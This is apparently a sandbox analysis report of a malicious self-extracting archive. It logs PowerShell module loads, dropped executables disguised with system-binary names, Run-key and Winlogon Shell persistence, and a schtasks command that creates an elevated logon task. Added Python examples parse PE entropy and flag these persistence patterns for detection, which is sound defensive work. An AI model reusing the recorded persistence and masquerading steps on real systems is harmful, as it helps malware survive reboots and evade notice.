                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\86b7f9ef8ac2e1
Source: KzLetzDiM8.exe | Static file information: File size 1896756 > 1048576
Source: KzLetzDiM8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KzLetzDiM8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KzLetzDiM8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KzLetzDiM8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KzLetzDiM8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KzLetzDiM8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: KzLetzDiM8.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: KzLetzDiM8.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.pdb | source: ComComponentDriverInto.exe, 00000008.00000002.2014307419.000000000301B000.00000004.00000800.00020000.00000000.sdmp
Source: KzLetzDiM8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KzLetzDiM8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KzLetzDiM8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KzLetzDiM8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KzLetzDiM8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | File created: C:\fontdriversavescrt\__tmp_rar_sfx_access_check_6636546
Source: KzLetzDiM8.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001FF640 push ecx; ret 0_2_001FF653
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001FEB78 push eax; ret 0_2_001FEB96
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Code function: 8_2_00007FFD9BAB4726 pushfd ; iretd 8_2_00007FFD9BAB4729
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Code function: 8_2_00007FFD9BEBE5C9 pushad ; iretd 8_2_00007FFD9BEBE5D9
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Code function: 81_2_00007FFD9BAA4726 pushfd ; iretd 81_2_00007FFD9BAA4729
Source: ComComponentDriverInto.exe.0.dr | Static PE information: section name: .text entropy: 7.58091390366067
Source: OXiaaPzsOIsoqrAHYxAVs.exe.8.dr | Static PE information: section name: .text entropy: 7.58091390366067
Source: sihost.exe.8.dr | Static PE information: section name: .text entropy: 7.58091390366067
Source: ComComponentDriverInto.exe.8.dr | Static PE information: section name: .text entropy: 7.58091390366067
Source: WmiPrvSE.exe.8.dr | Static PE information: section name: .text entropy: 7.58091390366067
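The two static facts the report lists for the sample and its drops, the DllCharacteristics flags (DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE) and a .text section entropy of 7.58 bits per byte on every dropped copy, both come from reading the PE header. The following added example is mine, not part of the Joe Sandbox report or of the sample: it parses the section table and the DllCharacteristics field of a PE with only the standard library, computes Shannon entropy per section and flags anything above 7.0 bits per byte as likely packed or encrypted (the threshold is an assumption; plain compiled code normally sits well below it). Because the sample is not embedded here, the block builds a constructed two-section PE32+ image in memory, with pseudo-random filler standing in for a packed .text and a repetitive .rdata for contrast; the builder is only meant to exercise the parser and produces no loadable executable.

```python
import math
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (the field sits at offset 70 in both PE32 and PE32+)
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
HIGH_ENTROPY = 7.0   # assumption: bits/byte above this is treated as packed or encrypted data


def shannon_entropy(data):
    """Bits per byte of `data`: 0.0 for empty input, 8.0 for perfectly uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(blob):
    """Return (dll_characteristics_names, [(section_name, raw_size, entropy), ...])."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    size_opt = struct.unpack_from("<H", blob, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    dllchars = struct.unpack_from("<H", blob, opt + 70)[0]
    flags = [name for bit, name in DLL_CHARACTERISTICS.items() if dllchars & bit]
    sections = []
    table = opt + size_opt                                # section table follows the optional header
    for i in range(num_sections):
        hdr = table + i * 40                              # IMAGE_SECTION_HEADER is 40 bytes
        name = blob[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", blob, hdr + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, raw_size, shannon_entropy(blob[raw_ptr:raw_ptr + raw_size])))
    return flags, sections


def section_report(blob):
    """Hardening flags plus a per-section entropy verdict, the two facts listed in the report."""
    flags, sections = parse_pe(blob)
    return {
        "flags": flags,
        "sections": [{"name": n, "size": s, "entropy": round(e, 2), "high_entropy": e > HIGH_ENTROPY}
                     for n, s, e in sections],
    }


def _lcg_bytes(n, seed=0x1234):
    """Deterministic pseudo-random filler standing in for packed code (constructed data)."""
    out, x = bytearray(), seed
    for _ in range(n):
        x = (x * 1103515245 + 12345) & 0x7FFFFFFF
        out.append((x >> 16) & 0xFF)
    return bytes(out)


def build_demo_pe(sections, dllchars):
    """Constructed minimal PE32+ header plus raw sections: enough for parse_pe, not loadable."""
    e_lfanew, size_opt, align = 0x40, 240, 0x200
    raw_ptr = -(-(e_lfanew + 4 + 20 + size_opt + 40 * len(sections)) // align) * align
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, size_opt, 0x22)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x20B)                 # PE32+ magic
    struct.pack_into("<H", opt, 70, dllchars)
    headers, body = b"", b""
    for name, data in sections:
        headers += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(data), 0x1000, len(data), raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += data + b"\0" * (-len(data) % align)
    image = dos + b"PE\0\0" + coff + bytes(opt) + headers
    return image + b"\0" * (raw_ptr - len(image)) + body


# Constructed demo image: a "packed" .text next to a low-entropy .rdata, with the sample's four flags set.
DEMO_PE = build_demo_pe([(b".text", _lcg_bytes(4096)), (b".rdata", b"ABCD" * 128)],
                        0x0040 | 0x0100 | 0x4000 | 0x8000)

if __name__ == "__main__":
    rep = section_report(DEMO_PE)
    print("DllCharacteristics:", ", ".join(rep["flags"]))
    for s in rep["sections"]:
        print(f"{s['name']:<8} {s['size']:>6} bytes  entropy {s['entropy']:.2f}"
              f"  {'HIGH' if s['high_entropy'] else ''}")
```

To run it against a real file, pass `open(path, "rb").read()` to `section_report` instead of `DEMO_PE`. The 7.58 seen on the sample's .text is unusual for ordinary compiled .NET code and is the reason the report groups these entries with packing indicators; the hardening flags, by contrast, say nothing about intent, since the same linker defaults produce them for benign binaries.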

Persistence and Installation Behavior

Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 identical entries collapsed)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\user\Desktop\gLKxhGkC.log
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\user\Desktop\rzpnRRfk.log
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\user\Desktop\IGGSkEKz.log
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | File created: C:\fontdriversavescrt\ComComponentDriverInto.exe
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\user\Desktop\jwqNoTvv.log
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\user\Desktop\ppTmQzAj.log
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\Default\Documents\sihost.exe
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\user\Desktop\izOFSTgA.log
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\user\Desktop\AdxdALuR.log
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\fontdriversavescrt\WmiPrvSE.exe

Boot Survival

Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (6 identical entries collapsed)
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVs (3 identical entries collapsed)
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE (3 identical entries collapsed)
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost (3 identical entries collapsed)
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverInto (5 identical entries collapsed)
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /f
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverInto (4 identical entries collapsed)
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost (2 identical entries collapsed)
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVs (2 identical entries collapsed)
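The Persistence and Boot Survival entries above show the pattern behind several of the Sigma hits listed for this sample: copies named after Windows system binaries (sihost.exe, WmiPrvSE.exe, SecurityHealthSystray.exe) dropped outside their genuine directories or written into System32 by csc.exe rather than by a servicing process, a logon task that runs one of them with /rl HIGHEST from the Default profile (C:\Users\Default User is a compatibility junction to C:\Users\Default, so the task and the dropped file point at the same sihost.exe), and a modified Winlogon Shell value. The following added example is mine and not part of the report: it turns those observations into offline triage rules and runs them over constructed inputs copied from the entries above. The expected-location table, the installer allow-list, the junction mapping and the Winlogon Shell value (the report records only that the value changed, not its content) are assumptions to be tuned per environment.

```python
import ntpath
import re

# Genuine homes of the Windows binaries whose names this sample reuses (assumption: default paths;
# same idea as the Sigma rule "Files With System Process Name In Unsuspected Locations").
EXPECTED_HOME = {
    "sihost.exe": {r"c:\windows\system32"},
    "wmiprvse.exe": {r"c:\windows\system32\wbem", r"c:\windows\syswow64\wbem"},
    "securityhealthsystray.exe": {r"c:\windows\system32"},
}
# Processes expected to place executables under Windows or Program Files (assumption; tune per estate).
INSTALLERS = {"trustedinstaller.exe", "tiworker.exe", "msiexec.exe", "wuauclt.exe"}
PROTECTED_ROOTS = (r"c:\windows", r"c:\program files", r"c:\program files (x86)")
DEFAULT_PROFILE = r"c:\users\default"
# "C:\Users\Default User" is a compatibility junction to C:\Users\Default (assumed default layout).
JUNCTIONS = {r"c:\users\default user": DEFAULT_PROFILE}


def normalize(path):
    p = ntpath.normpath(path).lower()
    for alias, target in JUNCTIONS.items():
        if p == alias or p.startswith(alias + "\\"):
            p = target + p[len(alias):]
    return p


def under(path, roots):
    return any(path == r or path.startswith(r + "\\") for r in roots)


def masquerades(path):
    """True when `path` borrows a system binary's name but lives outside that binary's directory."""
    name, home = ntpath.basename(path), ntpath.dirname(path)
    return name in EXPECTED_HOME and home not in EXPECTED_HOME[name]


def check_dropped_file(writer, path):
    """Rule names that fire for an executable written by `writer` to `path`."""
    w, p = normalize(writer), normalize(path)
    hits = []
    if masquerades(p):
        hits.append("system-name-outside-expected-dir")
    if under(p, PROTECTED_ROOTS) and ntpath.basename(w) not in INSTALLERS:
        hits.append("protected-dir-write-by-non-installer")      # e.g. csc.exe writing into System32
    if p.endswith(".exe") and not under(p, PROTECTED_ROOTS + (r"c:\users",)):
        hits.append("executable-outside-standard-roots")         # C:\Recovery, C:\fontdriversavescrt
    if under(p, (DEFAULT_PROFILE,)):
        hits.append("write-into-default-profile")                # template copied into every new profile
    return hits


def _switch(cmdline, name):
    """Value of a schtasks /name switch; handles the nested "'...'" quoting seen in the report."""
    m = re.search(rf'/{name}\s+("[^"]*"|\S+)', cmdline, re.IGNORECASE)
    return m.group(1).strip("\"'") if m else None


def check_schtask(cmdline):
    """Parse `schtasks /create ...` and flag an elevated logon task that runs from an odd location."""
    target = normalize(_switch(cmdline, "tr") or "")
    info = {"name": _switch(cmdline, "tn"), "schedule": _switch(cmdline, "sc"),
            "runlevel": (_switch(cmdline, "rl") or "").upper(), "target": target, "hits": []}
    if info["runlevel"] == "HIGHEST" and not under(target, PROTECTED_ROOTS):
        info["hits"].append("highest-runlevel-outside-protected-roots")
    if masquerades(target):
        info["hits"].append("system-name-outside-expected-dir")
    if under(target, (DEFAULT_PROFILE,)):
        info["hits"].append("runs-from-default-profile")
    return info


def check_winlogon_shell(value):
    """Winlogon\\Shell should be exactly explorer.exe; every extra entry is launched at each logon."""
    extra = []
    for entry in (v.strip() for v in value.split(",") if v.strip()):
        e = normalize(entry)
        if ntpath.basename(e) != "explorer.exe" or ntpath.dirname(e) not in ("", r"c:\windows"):
            extra.append(e)
    return extra


# Constructed from the report entries above: (writer process, executable created).
DROPPED = [
    (r"C:\Users\user\Desktop\KzLetzDiM8.exe", r"C:\fontdriversavescrt\ComComponentDriverInto.exe"),
    (r"C:\fontdriversavescrt\ComComponentDriverInto.exe", r"C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"),
    (r"C:\fontdriversavescrt\ComComponentDriverInto.exe", r"C:\Users\Default\Documents\sihost.exe"),
    (r"C:\fontdriversavescrt\ComComponentDriverInto.exe", r"C:\fontdriversavescrt\WmiPrvSE.exe"),
    (r"C:\fontdriversavescrt\ComComponentDriverInto.exe",
     r"C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", r"C:\Windows\System32\SecurityHealthSystray.exe"),
]
SCHTASK = ('schtasks.exe /create /tn "sihost" /sc ONLOGON '
           '/tr "\'C:\\Users\\Default User\\Documents\\sihost.exe\'" /rl HIGHEST /f')
# The report only records that Winlogon\Shell changed; this value is a constructed illustration.
SHELL_VALUE = r"explorer.exe, C:\fontdriversavescrt\ComComponentDriverInto.exe"


def triage(dropped=DROPPED, schtask=SCHTASK, shell=SHELL_VALUE):
    return {
        "files": {path: check_dropped_file(writer, path) for writer, path in dropped},
        "task": check_schtask(schtask),
        "shell": check_winlogon_shell(shell),
    }


if __name__ == "__main__":
    result = triage()
    for path, hits in result["files"].items():
        print(f"{path}\n    {', '.join(hits) or 'clean'}")
    print("task:", result["task"])
    print("winlogon shell extras:", result["shell"])
```

Every executable the sample dropped trips at least one rule, and the single legitimate case a servicing process writing sihost.exe into System32 trips none, which is the separation a detection should give before being pointed at EDR file-create and registry telemetry.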

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (45 identical entries collapsed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (33 identical entries collapsed)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
